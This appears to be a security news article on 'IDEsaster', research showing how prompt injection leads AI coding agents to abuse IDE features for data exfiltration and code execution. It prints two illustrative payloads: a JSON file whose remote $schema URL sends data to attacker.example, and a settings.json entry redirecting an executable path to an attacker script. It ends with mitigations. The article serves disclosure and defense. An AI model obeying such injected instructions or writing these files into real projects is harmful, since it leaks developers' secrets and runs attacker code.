The research, codenamed “IDEsaster,” reveals that the very software layers powering modern AI coding tools such as GitHub Copilot, Cursor, Claude Code, and JetBrains Junie can be exploited through their integration with base IDE features.
Unlike earlier weaknesses that targeted individual AI extensions or configurations, IDEsaster exploits underlying mechanisms shared across multiple Integrated Development Environments (IDEs), such as Visual Studio Code, JetBrains IDEs, and Zed.dev. Because these editors form the foundation for nearly all AI‑assisted coding tools, a single exploitable behavior can cascade across an entire ecosystem.
The vulnerabilities allow attackers to chain prompt injection with legitimate IDE functionality, creating a new pattern: Prompt Injection → Tools → Base IDE Features.
Once the AI agent is tricked into executing malicious instructions, it can manipulate standard IDE features to exfiltrate data or compromise the system without any apparent bug in the AI tool itself.
More than 30 vulnerabilities have been reported, 24 CVEs have been assigned, and at least 10 market‑leading AI development platforms have been confirmed affected.
Major vendors, including AWS, GitHub, and Roo Code, have released advisories or patches. An AWS bulletin (AWS‑2025‑019) and updated security guidance from Anthropic acknowledge the exposure, underscoring the scale of the risk.
Researchers demonstrated several exploitation scenarios. In one case, AI agents could leak sensitive data by writing JSON files that referenced remote schemas, causing the IDE to automatically send data to external servers.
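As an illustration only, a planted JSON file could take roughly the following shape; the domain, query parameter, and field names here are hypothetical, not taken from the research. A schema-aware IDE that auto-resolves `$schema` would request the remote URL, carrying whatever the agent was tricked into embedding in it:

```json
{
  "$schema": "https://attacker.example/schema.json?leak=ENCODED_SECRET_DATA",
  "name": "innocuous-config"
}
```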
Another showed how editing IDE‑level configuration files, such as VS Code’s .vscode/settings.json or JetBrains’ workspace.xml, could redirect executable paths to attacker-controlled scripts.
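A hedged sketch of that second scenario: VS Code exposes settings that point to local executables, and `php.validate.executablePath` is one commonly cited example of such a key (the path below is hypothetical). If an agent can be prompted into writing this into `.vscode/settings.json`, the IDE may later run the attacker's script instead of the real binary:

```json
{
  "php.validate.executablePath": "/tmp/attacker-payload.sh"
}
```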
Multi‑root workspaces in Visual Studio Code further magnified the severity, enabling Remote Code Execution (RCE) even when prior mitigations blocked abuse of project‑specific settings.
CVEs like CVE‑2025‑54130, CVE‑2025‑53536, and CVE‑2025‑64660 document confirmed exploitation avenues.
The findings emphasize that legacy IDEs were never designed for autonomous AI agents capable of manipulating files or performing network actions. To address the growing AI‑integration risk, the research proposes a new principle: “Secure for AI.”
This extends traditional secure‑by‑design practices to explicitly consider how AI features change trust boundaries.
Mitigations include restricting tool scopes, applying human‑in‑the‑loop (HITL) controls, enforcing egress filtering, and sandboxing execution.
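The HITL control mentioned above can be sketched as a simple policy gate in front of an agent's tool calls. Everything here is illustrative: the tool name `write_file`, the path list, and the approval callback are assumptions for the sketch, not any vendor's actual API.

```python
# Minimal sketch of a human-in-the-loop (HITL) gate for agent tool calls.
# Tool names, paths, and policy are illustrative assumptions only.

SENSITIVE_PATHS = (".vscode/", ".idea/", "workspace.xml", "settings.json")

def requires_approval(tool: str, target: str) -> bool:
    """Flag any write that touches IDE-level configuration for human review."""
    return tool == "write_file" and any(p in target for p in SENSITIVE_PATHS)

def run_tool(tool: str, target: str, approve=lambda tool, target: False) -> str:
    """Execute a tool call unless it needs, and lacks, human approval."""
    if requires_approval(tool, target) and not approve(tool, target):
        return "blocked: human approval required"
    return f"executed {tool} on {target}"
```

The point of the sketch is that the gate sits outside the agent: even a fully prompt-injected model cannot rewrite IDE configuration without a human clicking through.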
Developers are urged to use AI IDEs only with trusted projects and to review configurations for hidden prompt-injection vectors until vendors fully adopt the Secure for AI model.
The post AI Development Tools Hit by Major Security Flaws Affecting Millions appeared first on Cyber Security News.